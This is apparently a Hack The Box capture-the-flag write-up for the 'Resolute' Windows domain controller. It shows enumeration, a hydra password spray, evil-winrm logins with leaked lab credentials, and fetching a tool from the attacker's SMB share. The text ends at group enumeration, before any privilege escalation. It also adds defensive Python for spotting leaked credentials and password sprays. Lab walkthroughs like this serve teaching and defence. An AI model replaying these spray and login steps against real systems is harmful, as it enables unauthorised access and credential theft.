Quick Summary
→ Resolute is rated as a medium machine but it is an easy box. In the first phase you easily find the users of the box and one password by using enum4linux. I ran hydra to brute force the users with that single password and quickly got working creds for melanie. I used the creds with evil-winrm and got user.txt. The root part gave me a little bit of a headache because there is an Anti-Virus on the machine and I always got disconnected when I transferred a file like nc.exe or winPEAS.exe for privilege escalation. During my enumeration I found another user, ryan, whose password is hidden in a directory. After I found it I switched from melanie to ryan. While enumerating as ryan I found that he is part of DNSAdmins, which can be abused by adding a malicious DLL as the DNS server plugin. Using impacket-smbserver I can serve my dll file to the machine; restarting the dns service then executes my dll as administrator.
Penetration Testing Methodologies
Network Scanning
→ Nmap scan
→ discover open ports and what services are running
Enumeration
→ running enum4linux gives some usernames and one password, which can be used later
Post - Exploitation
→ with Hydra I brute force all the usernames with only that one password; the password belongs to melanie
→ using Evil-WinRM to login as melanie and get user.txt
Exploitation
→ enumerating the file directory there is another user, ryan
→ using ls -hidden we see a file which contains juicy information
→ by reading the .txt file I got the password of ryan, then switched user
Privilege Escalation
→ create a malicious dll file with msfvenom
→ serve my dll file with impacket-smbserver
→ run my meterpreter listener
→ stop and start the dns service
→ finally I got administrator and root.txt
Network Scanning
Walkthrough
→ I always begin with NMAP to look at which services are running. I always use
- -sV ⇒ probe open ports to determine service/version info
- -sC ⇒ equivalent to --script=default
- -A ⇒ aggressive scan
- -oN ⇒ save our scan results to a text file

```bash
nmap -sV -sC -A 10.10.10.169 -oN nmap-Resolute
```
```bash
root in htb/boxes/Resolute ❯ nmap -sV -sC -A -oN nmap-Resolute 10.10.10.169
Starting Nmap 7.80 ( https:
WARNING: RST from 10.10.10.169 port 53 -- is this port really open?
WARNING: RST from 10.10.10.169 port 53 -- is this port really open?
Nmap scan report for 10.10.10.169
Host is up (0.26s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-30 23:11:35Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https:
SF-Port53-TCP:V=7.80%I=7%D=5/31%Time=5ED2E596%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=5/31%OT=53%CT=1%CU=35791%PV=Y%DS=2%DC=T%G=Y%TM=5ED2E64
OS:6%P=x86_64-pc-linux-gnu)SEQ(SP=F9%GCD=4%ISR=109%TI=RD%CI=I%II=I%TS=8)SEQ
OS:(SP=102%GCD=1%ISR=104%TI=I%CI=I%II=I%SS=O%TS=A)OPS(O1=%O2=%O3=M54DNW8NNT
OS:11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M54DST11)WIN(W1=0%W2=0%W3=2000%W4=20
OS:00%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%
OS:DF=Y%T=80%S=Z%A=S+%F=AR%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=
OS:0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S
OS:=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R
OS:=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=
OS:AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%
OS:RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h31m01s, deviation: 4h02m30s, median: 11m00s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2020-05-30T16:12:18-07:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-05-30T23:12:22
|_  start_date: 2020-05-30T22:15:46

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   210.01 ms 10.10.14.1
2   217.91 ms 10.10.10.169

OS and Service detection performed. Please report any incorrect results at https:
# Nmap done at Sun May 31 07:03:34 2020 -- 1 IP address (1 host up) scanned in 216.34 seconds

root in htb/boxes/Resolute took 2m8s ❯
```
We’ve got a lot of open ports, but the interesting ones are 445 (smb), 53 (dns), 88 (kerberos) and 5985 (WinRM).
Enumeration
Enum4linux
To enumerate some juicy information from the box I use enum4linux, so let’s see:

```bash
root in htb/boxes/Resolute ❯ enum4linux -o -U -G -S 10.10.10.169
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun May 31 08:06:03 2020

 ==========================
|    Target Information    |
 ==========================
Target ........... 10.10.10.169
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ====================================================
|    Enumerating Workgroup/Domain on 10.10.10.169    |
 ====================================================
```
As you can see here there are a lot of users but only one password, Welcome123!, and it belongs to the user marko:

```bash
 =============================
|    Users on 10.10.10.169    |
 =============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail    Name: (null)    Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator    Name: (null)    Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela    Name: (null)    Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette    Name: (null)    Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika    Name: (null)    Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire    Name: (null)    Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude    Name: (null)    Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount    Name: (null)    Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia    Name: (null)    Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred    Name: (null)    Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest    Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo    Name: (null)    Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt    Name: (null)    Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus    Name: (null)    Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko    Name: Marko Novak    Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie    Name: (null)    Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki    Name: (null)    Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo    Name: (null)    Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per    Name: (null)    Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan    Name: Ryan Bertrand    Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally    Name: (null)    Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon    Name: (null)    Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve    Name: (null)    Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie    Name: (null)    Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita    Name: (null)    Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf    Name: (null)    Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach    Name: (null)    Desc: (null)

[1]+  Stopped                 enum4linux -o -U -G -S 10.10.10.169

root in htb/boxes/Resolute took 2m4s ❯
```
As you can see in this line there are a lot of usernames but only one password, and it belongs to marko:

```bash
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko    Name: Marko Novak    Desc: Account created. Password set to Welcome123!
```
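Descriptions like marko’s are a classic place for credentials to leak in Active Directory, and the same enum4linux line also carries the SAMR account-control bits (the `acb` value). The Python below is an added example of mine, not code from the writeup: it parses user lines in the format shown above (the sample input is constructed from the lines in this post), decodes the `acb` flags, and reports any description that looks like it contains a password, which is the audit a domain admin would want to run before anyone else does.

```python
import re

# Constructed sample modelled on the enum4linux "Users on 10.10.10.169" lines above.
SAMPLE_ENUM4LINUX = """\
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: (null)
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null)
"""

# One enum4linux user line: index / RID / acb / Account / Name / Desc.
USER_LINE = re.compile(
    r"index:\s*(?P<index>0x[0-9a-f]+)\s+RID:\s*(?P<rid>0x[0-9a-f]+)\s+acb:\s*(?P<acb>0x[0-9a-f]+)"
    r"\s+Account:\s*(?P<account>\S+)\s+Name:\s*(?P<name>.*?)\s+Desc:\s*(?P<desc>.*)$"
)

# Phrases that betray a secret stored in the AD description attribute.
SECRET_HINTS = re.compile(r"(password|passwd|pwd|pass)\s*(set to|is|:|=)", re.IGNORECASE)

# SAMR account-control bits (ACB_*) as reported in the acb column.
ACB_BITS = [
    (0x0001, "disabled"),
    (0x0004, "password-not-required"),
    (0x0010, "normal"),
    (0x0200, "password-never-expires"),
    (0x0400, "auto-locked"),
]


def acb_flags(acb):
    """Decode an acb integer into the human-readable flags that are set."""
    return [name for bit, name in ACB_BITS if acb & bit]


def parse_users(text):
    """Parse enum4linux user lines into dicts; '(null)' becomes an empty string."""
    users = []
    for line in text.splitlines():
        m = USER_LINE.search(line)
        if not m:
            continue
        u = m.groupdict()
        u["rid"] = int(u["rid"], 16)
        u["acb"] = int(u["acb"], 16)
        for key in ("name", "desc"):
            if u[key] == "(null)":
                u[key] = ""
        users.append(u)
    return users


def find_description_secrets(users):
    """Return (account, description) pairs whose description looks like it holds a password."""
    return [(u["account"], u["desc"]) for u in users if SECRET_HINTS.search(u["desc"])]


if __name__ == "__main__":
    parsed = parse_users(SAMPLE_ENUM4LINUX)
    for account, desc in find_description_secrets(parsed):
        print(f"[!] {account}: description contains a credential -> {desc!r}")
    for u in parsed:
        print(f"{u['account']:<15} RID {u['rid']:<6} {', '.join(acb_flags(u['acb']))}")
```

Feeding the full enum4linux output through `parse_users` and `find_description_secrets` gives the same single hit the post found by eye, and the `acb` decode shows which of the accounts never expire their password, which is worth knowing when a spray like the one below succeeds.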
Post - Exploitation
Evil-WinRM
I tried to login with evil-winrm but it failed! So I decided to use hydra: save all the usernames to a text file and brute force them with only the one password:

```bash
root in htb/boxes/Resolute ❯ hydra -t 1 -V -f -L users.txt -p "Welcome123!" 10.10.10.169 smb
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https:
[DATA] max 1 task per 1 server, overall 1 task, 24 login tries (l:24/p:1), ~24 tries per task
[DATA] attacking smb:
[ATTEMPT] target 10.10.10.169 - login "abigail" - pass "Welcome123!" - 1 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "angela" - pass "Welcome123!" - 2 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "annette" - pass "Welcome123!" - 3 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "annika" - pass "Welcome123!" - 4 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "claire" - pass "Welcome123!" - 5 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "claude" - pass "Welcome123!" - 6 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "felicia" - pass "Welcome123!" - 7 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "fred" - pass "Welcome123!" - 8 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "gustavo" - pass "Welcome123!" - 9 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "Guest" - pass "Welcome123!" - 10 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "marcus" - pass "Welcome123!" - 11 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "marko" - pass "Welcome123!" - 12 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "melanie" - pass "Welcome123!" - 13 of 24 [child 0] (0/0)
[445][smb] host: 10.10.10.169   login: melanie   password: Welcome123!
[STATUS] attack finished for 10.10.10.169 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-31 08:10:04

root in htb/boxes/Resolute took 8s ❯
```
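What hydra did here is a password spray: one password tried against many accounts from a single source, finishing with one success. From the blue-team side that shape is easy to pick out of the Windows Security log, so as an added example (mine, not part of the writeup) here is the detection logic over events 4625 (failed logon) and 4624 (logon) in a simplified record form; the events are constructed to mirror the run above and the field names are my own flattening of the event XML, not the real schema.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed events: a simplified view of Security 4625 / 4624 records. The field
# names are my own, not the event XML schema.
BASE = datetime(2020, 5, 31, 8, 10, 0)
SPRAYED = ["abigail", "angela", "annette", "annika", "claire", "claude",
           "felicia", "fred", "gustavo", "Guest", "marcus", "marko"]


def _ev(offset_s, event_id, user, src, logon_type=3):
    return {"time": BASE + timedelta(seconds=offset_s), "event_id": event_id,
            "target_user": user, "source_ip": src, "logon_type": logon_type}


SAMPLE_EVENTS = (
    [_ev(i, 4625, u, "10.10.14.187") for i, u in enumerate(SPRAYED)]   # 12 failures, one per user
    + [_ev(12, 4624, "melanie", "10.10.14.187")]                         # then one success
    + [_ev(60, 4625, "fred", "10.10.10.50", 2),                          # benign: one user mistyping
       _ev(67, 4625, "fred", "10.10.10.50", 2)]
)


def detect_password_spray(events, window=timedelta(minutes=5), min_users=5):
    """Flag sources whose failed logons cover >= min_users distinct accounts inside `window`.

    Returns one finding per offending source, including any account that logged on
    successfully from that source shortly after the spray (the part that matters most).
    """
    events = sorted(events, key=lambda e: e["time"])
    failures = defaultdict(list)
    successes = defaultdict(list)
    for e in events:
        if e["event_id"] == 4625:
            failures[e["source_ip"]].append(e)
        elif e["event_id"] == 4624:
            successes[e["source_ip"]].append(e)

    findings = []
    for src, fails in failures.items():
        best = None  # (distinct users, window start, window end) for the densest window
        start = 0
        for end in range(len(fails)):
            # slide the left edge forward until the window fits
            while fails[end]["time"] - fails[start]["time"] > window:
                start += 1
            users = {f["target_user"] for f in fails[start:end + 1]}
            if best is None or len(users) > len(best[0]):
                best = (users, fails[start]["time"], fails[end]["time"])
        if best is None or len(best[0]) < min_users:
            continue
        users, first, last = best
        later = sorted({s["target_user"] for s in successes[src]
                        if last <= s["time"] <= last + window})
        findings.append({
            "source_ip": src,
            "distinct_users": len(users),
            "attempts": sum(1 for f in fails if first <= f["time"] <= last),
            "window_start": first,
            "window_end": last,
            "followed_by_success": later,
        })
    return findings


if __name__ == "__main__":
    for f in detect_password_spray(SAMPLE_EVENTS):
        print(f"[!] spray from {f['source_ip']}: {f['distinct_users']} accounts in "
              f"{f['attempts']} attempts; success for {f['followed_by_success'] or 'nobody'}")
```

The threshold is on distinct target accounts rather than raw failure count, which is what separates a spray from a single user fat-fingering a password; the same source failing for a dozen different users inside a few seconds is not a typo.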
Looks easy, right? The password belongs to the user melanie. Now, using Evil-WinRM, I will try to login again.

```bash
root in evil-winrm on master via 💎 v2.7.0 ❯ ./evil-winrm.rb -i 10.10.10.169 -u melanie -p Welcome123!

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\melanie\Documents> whoami
megabank\melanie
*Evil-WinRM* PS C:\Users\melanie\Documents>
```
This is one of the easiest user parts I have experienced. Now let’s grab user.txt, then move to privilege escalation.

```bash
*Evil-WinRM* PS C:\Users\melanie\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\melanie\Desktop> Get-Content "user.txt" | Measure-Object -Character -Word

Lines Words Characters Property
----- ----- ---------- --------
          1         32


*Evil-WinRM* PS C:\Users\melanie\Desktop>
```
Exploitation
Transfer file with SAMBA
The enumeration starts again. First I try to transfer winPEAS.exe; it is similar to LinEnum.sh for Linux and helps penetration testers find useful info that they can use for privilege escalation. So first I set up my smb configuration:

```ini
[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = Payas0
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes

[medz]
path = /root/htb/boxes/Resolute/
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody
```

Then start the service:

```bash
root in htb/boxes/Resolute ❯ smbd service restart
```
Now copy winPEAS.exe over samba:

```bash
*Evil-WinRM* PS C:\Users\melanie\Documents> copy \\10.10.14.187\medz\winPEAS.exe
```

But this one failed me. The machine has an Anti-Virus that always disconnects me when I try to transfer a file like nc.exe or winPEAS, so let’s do another thing: enumerate the directories.
Hidden directories
```bash
*Evil-WinRM* PS C:\Users\melanie\Documents> cd /
*Evil-WinRM* PS C:\> ls -hidden


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-       12/3/2019   6:40 AM                $RECYCLE.BIN
d--hsl       9/25/2019  10:17 AM                Documents and Settings
d--h--       9/25/2019  10:48 AM                ProgramData
d--h--       12/3/2019   6:32 AM                PSTranscripts
d--hs-       9/25/2019  10:17 AM                Recovery
d--hs-       9/25/2019   6:25 AM                System Volume Information
-arhs-      11/20/2016   5:59 PM         389408 bootmgr
-a-hs-       7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-       5/30/2020   3:15 PM      402653184 pagefile.sys


*Evil-WinRM* PS C:\>
```
PSTranscripts is very interesting because it is not a default Windows folder, so let’s look inside it:

```bash
*Evil-WinRM* PS C:\> cd PSTranscripts
*Evil-WinRM* PS C:\PSTranscripts> dir
*Evil-WinRM* PS C:\PSTranscripts> ls -hidden


    Directory: C:\PSTranscripts


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--h--       12/3/2019   6:45 AM                20191203


*Evil-WinRM* PS C:\PSTranscripts>
```
The dir command will not show what is really inside the folder, so I use ls -hidden to show the hidden files, and there is another folder, 20191203:

```bash
*Evil-WinRM* PS C:\PSTranscripts> cd 20191203
*Evil-WinRM* PS C:\PSTranscripts\20191203> ls -hidden


    Directory: C:\PSTranscripts\20191203


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--       12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt


*Evil-WinRM* PS C:\PSTranscripts\20191203>
```
Very interesting! Let’s see what is inside that text file.

```bash
*Evil-WinRM* PS C:\PSTranscripts\20191203> more PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ') if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
*Evil-WinRM* PS C:\PSTranscripts\20191203>
```
Looking at this I got another user, ryan, and his possible password Serv3r4Admin4cc123!:

```bash
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
```
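Transcription logging caught ryan’s password because the whole command line, password included, is written into the transcript file. The Python scanner below is an added example of mine, not part of the writeup: it walks a transcript (the sample here is constructed from the one above, plus one extra `ConvertTo-SecureString` line of my own to show a second pattern), reports the lines where a credential was passed on the command line, and returns a redacted copy of each so the finding can be triaged without copying the secret around. The rule names are my own.

```python
import re

# Constructed transcript modelled on the one above; the ConvertTo-SecureString line is
# my own addition to exercise a second leak pattern.
SAMPLE_TRANSCRIPT = r"""**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
PS>Get-ChildItem C:\PSTranscripts
PS>$pw = ConvertTo-SecureString 'Hunter2!' -AsPlainText -Force
"""

# Each rule defines a 'secret' group; that span is what gets redacted in the report.
RULES = [
    # everything after the UNC path on a `net use` line is a password and/or user token
    ("net-use-credential",
     re.compile(r"net\s+use\s+\S+\s+\\\\\S+\s+(?P<secret>.+)$", re.I)),
    # a literal handed to ConvertTo-SecureString together with -AsPlainText
    ("securestring-plaintext",
     re.compile(r"ConvertTo-SecureString\s+(?P<secret>'[^']*'|\"[^\"]*\"|\S+)(?=.*-AsPlainText)", re.I)),
    # -Password / -pw style parameters followed by an inline literal
    ("inline-password-parameter",
     re.compile(r"(?:-Password|-pw|/password[:=])\s*(?P<secret>'[^']*'|\"[^\"]*\"|\S+)", re.I)),
]


def scan_transcript(text):
    """Return one finding per line that matches a credential-leak rule.

    Each finding carries the 1-based line number, the rule name, and the line with
    the secret span replaced by <REDACTED>; the secret itself is never returned.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for rule, rx in RULES:
            m = rx.search(line)
            if m:
                redacted = line[:m.start("secret")] + "<REDACTED>" + line[m.end("secret"):]
                findings.append({"line": lineno, "rule": rule, "redacted": redacted.strip()})
                break  # one finding per line is enough
    return findings


if __name__ == "__main__":
    for f in scan_transcript(SAMPLE_TRANSCRIPT):
        print(f"line {f['line']:>4}  {f['rule']:<26} {f['redacted']}")
```

Pointing `scan_transcript` at every file under a transcript directory is a one-line loop with `pathlib`; the point of returning redacted text is that the report can go into a ticket while the transcript itself stays locked down.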
Now from melanie I switch to the user ryan and start the enumeration again.

```bash
root in evil-winrm on master via 💎 v2.7.0 ❯ ./evil-winrm.rb -i 10.10.10.169 -u ryan -p 'Serv3r4Admin4cc123!' -e . -s .

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\ryan\Documents>
*Evil-WinRM* PS C:\Users\ryan\Documents>
```
Privilege Escalation
Abusing DNSAdmins privilege for escalation in Active Directory
Now let’s start enumerating again; I checked with whoami /all:

```bash
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all

USER INFORMATION
----------------

User Name     SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

